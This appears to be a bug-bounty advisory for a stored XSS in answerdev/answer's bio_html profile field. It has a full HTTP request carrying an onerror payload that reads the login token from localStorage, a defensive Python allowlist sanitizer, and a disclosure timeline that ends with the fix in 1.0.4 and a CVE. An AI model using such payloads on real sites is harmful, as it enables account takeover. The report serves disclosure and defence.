The user info modification function has a stored XSS vulnerability in answerdev/answer

Valid

Reported on

Jan 11th 2023


Description

This vulnerability allows a malicious user to submit arbitrary HTML in the bio_html field of the profile page; as soon as another user or administrator views that profile page, the injected script runs in their browser and can steal their identity token from local storage, resulting in the account being taken over by someone else.

Proof of Concept

step1. Log in to a user account.
step2. Send the following HTTP request to modify the personal information (the payload is in the bio_html field):

PUT /answer/api/v1/user/info HTTP/1.1
Host: localhost:9080
Authorization: 5f61e241-91a4-11ed-a458-0242ac110002
Content-Type: application/json
Content-Length: 264

{
    "display_name":"xiaoming",
    "username":"xiaoming",
    "avatar":{
        "type":"custom",
        "gravatar":"",
        "custom":"http://localhost:9080/uploads/avatar/4KbtWx52o5Y.png"
    },
    "bio":"",
    "website":"",
    "location":"",
    "bio_html":"<img src=x onerror=alert(localStorage.getItem('_a_lui_')) />"
}


step3. When other users view this user's profile page, e.g. http://localhost:9080/users/xiaoming, the stored XSS payload executes in their browser.
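Defender-side illustration added to this report (not answerdev/answer's own code, nor its fix in 1.0.4): a stdlib-only Python allowlist sanitizer for a rich-text profile field such as bio_html, applied to the payload above and to a constructed benign bio. The function name `sanitize_bio_html`, the tag/attribute allowlist and the sample inputs are assumptions of this example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist for a free-text profile field such as bio_html (assumed policy).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "code", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}

def _safe_href(url):
    # Only http(s) links survive; javascript:, data: and the like are dropped.
    return urlparse(url.strip()).scheme.lower() in ("http", "https")

class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # img, script, svg, ... are dropped entirely
        kept = []
        for name, value in attrs:
            # Event handlers (on*) and anything not explicitly allowed go away.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not _safe_href(value or ""):
                continue
            kept.append(' %s="%s"' % (name, escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text is re-escaped

def sanitize_bio_html(raw):
    """Return raw reduced to the allowlisted subset of HTML."""
    parser = _Sanitizer()
    parser.feed(raw)
    parser.close()
    return "".join(parser.out)

# Constructed inputs: the report's payload and a benign bio.
POC = "<img src=x onerror=alert(localStorage.getItem('_a_lui_')) />"
BENIGN = '<p>Hi, see <a href="https://example.org">my site</a> &amp; <b>more</b></p>'
```

Sanitizing on the server before storing bio_html addresses the injection; keeping the session token out of localStorage (an HttpOnly cookie instead) limits what any remaining script injection could read.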

Impact

This vulnerability allows a malicious user to submit arbitrary HTML in the bio_html field of the profile page; as soon as another user or administrator views that profile page, the injected script runs in their browser and can steal their identity token from local storage, resulting in the account being taken over by someone else.

References

We are processing your report and will contact the answerdev/answer team within 24 hours. 3 months ago
Re modified the report
3 months ago
Re modified the report
3 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
We have opened a pull request with a SECURITY.md for answerdev/answer to merge. 3 months ago
We have contacted a member of the answerdev/answer team and are waiting to hear back 3 months ago
We have sent a follow up to the answerdev/answer team. We will try again in 7 days. 2 months ago
answerdev/answer maintainer validated this vulnerability 2 months ago
Re has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Re
2 months ago

Researcher


Hi Team, could you help me apply for a CVE ID for this vulnerability? Thanks

Re
2 months ago

Researcher


@admin

answerdev/answer maintainer marked this as fixed in 1.0.4 with commit c3001d 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
answerdev/answer maintainer published this vulnerability 2 months ago
Ben Harvie
2 months ago

Admin


A CVE has been assigned as requested :)
